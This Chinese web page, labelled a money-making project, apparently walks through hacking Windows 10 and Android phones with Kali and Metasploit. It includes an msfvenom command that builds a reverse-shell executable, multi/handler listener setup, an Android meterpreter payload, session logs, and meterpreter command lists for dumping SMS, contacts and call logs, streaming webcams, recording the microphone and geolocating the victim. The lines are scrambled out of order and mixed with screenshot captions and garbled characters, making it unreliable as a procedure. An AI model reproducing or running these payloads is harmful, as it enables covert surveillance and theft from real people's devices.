[挣钱项目]kali2.0下入侵windows 10和android手机实战

admin 网络整理

resource Run the commands stored in a file

kali2.0入侵android手机实战

portfwd Forward a local port to a remote service

============================

info Displays information about a Post module

LPORT => 8888

cat Read the contents of a file to the screen

——- ———–

read Reads data from a channel

LPORT 4444 yes The listen port

Command Description

Command Description

Module options (exploit/multi/handler):

QQ截图20160617104244

check_root Check if device is rooted

cd Change directory

uuid Get the UUID for the current session

[*] Starting the payload handler…

[*] Sending stage (60790 bytes) to 172.19.0.172

Name Current Setting Required Description

upload Upload a file or directory

get_timeouts Get the current session timeout values

meterpreter > sessions -I

QQ截图20160617112812

===========================

webcam_snap Take a snapshot from the specified webcam

Core Commands

set LPORT 3333

[*] Preparing player…

show options

route View and modify the routing table

[*] Meterpreter session 1 opened (172.19.40.110:8888 -> 172.19.0.172:57070) at 2016-06-16 23:11:36 -0400

send_sms Sends SMS from target session

getwd Print working directory

dump_contacts Get contacts list

Stdapi: Networking Commands

exit Terminate the meterpreter session

EXITFUNC process yes Exit technique (Accepted: ”, seh, thread, process, none)

[*] Exploit completed, but no session was created.

set PAYLOAD android/meterpreter/reverse_tcp

exploit

[*] Command shell session 1 opened (192.168.168.111:3333 -> 192.168.168.109:3094) at 2016-06-16 20:59:00 -0400

=======================

transport Change the current transport mechanism

help Help menu

[*] Sending stage (336 bytes) to 192.168.168.109

=======================

ps List running processes

ifconfig Display interfaces

show options

kali-rolling

use exploit/multi/handler

C:\Users\�ѿ�\Desktop\projects>

sysinfo Gets information about the remote system, such as OS

use exploit/multi/handler

—- ————— ——– ———–

ls List files

================

[*] Starting the payload handler…

lcd Change local working directory

set LHOST 172.19.40.110

close Closes a channel

set LHOST 192.168.168.111

root@kali:~# msfconsole

interval_collect Manage interval collection capabilities

Name Current Setting Required Description

run Executes a meterpreter script or Post module

[*] Opening player at: kxQmnwHE.html

? Help menu

meterpreter > help

Stdapi: Webcam Commands

background Backgrounds the current session

disable_unicode_encoding Disables encoding of unicode strings

webcam_list List webcams

quit Terminate the meterpreter session

Android Commands

mkdir Make directory

write Writes data to a channel

[*] Device is not rooted

dump_sms Get sms messages

rmdir Remove directory

——- ———–

bgrun Executes a meterpreter script as a background thread

——- ———–

dir List files (alias for ls)

channel Displays information or control active channels

Command Description

enable_unicode_encoding Enables encoding of unicode strings

Stdapi: System Commands

QQ截图20160617104205

shell Drop into a system command shell

[*] Streaming…

Command Description

(c) 2015 Microsoft Corporation����������Ȩ����

dump_calllog Get call log

webcam_chat Start a video chat

QQ截图20160617112839

geolocate Get current lat-long using geolocation

——- ———–

^C[-] Exploit failed: Interrupt

msf exploit(handler) > exploit

webcam_stream Play a video stream from the specified webcam

Payload options (windows/x64/shell/reverse_tcp):

Stdapi: File system Commands

QQ截图20160617112853

sleep Force Meterpreter to go quiet, then re-establish session.

=============

bglist Lists running background scripts

[*] Started reverse TCP handler on 172.19.40.110:8888

set payload windows/x64/shell/reverse_tcp

use Deprecated alias for ‘load’

QQ截图20160617104228

pwd Print working directory

[*] Started reverse TCP handler on 172.19.40.110:4444

search Search for files

set_timeouts Set the current session timeout values

Command Description

meterpreter > webcam_stream

irb Drop into irb scripting mode

Command Description

[*] Started reverse TCP handler on 192.168.168.111:3333

edit Edit a file

lpwd Print local working directory

—- ————— ——– ———–

root@kali:~# service postgresql start

[*] Starting…

wlan_geolocate Get current lat-long using WLAN information

execute Execute a command

download Download a file or directory

load Load one or more meterpreter extensions

——- ———–

LHOST yes The listen address

——- ———–

getlwd Print local working directory

msf exploit(handler) > set LPORT 8888

msfvenom –platform windows -p windows/x64/shell/reverse_tcp LHOST=192.168.168.111 LPORT=3333 EXITFUNC=thread -b ‘\x00’ -f exe-only -o /root/Desktop/shell1.exe

machine_id Get the MSF ID of the machine attached to the session

meterpreter > check_root

[*] Starting the payload handler…

record_mic Record audio from the default microphone for X seconds

ipconfig Display interfaces

getuid Get the user that the server is running as

QQ截图20160617111539

bgkill Kills a background meterpreter script

QQ截图20160617111438

exploit

Microsoft Windows [�汾 10.0.10586]

rm Delete the specified file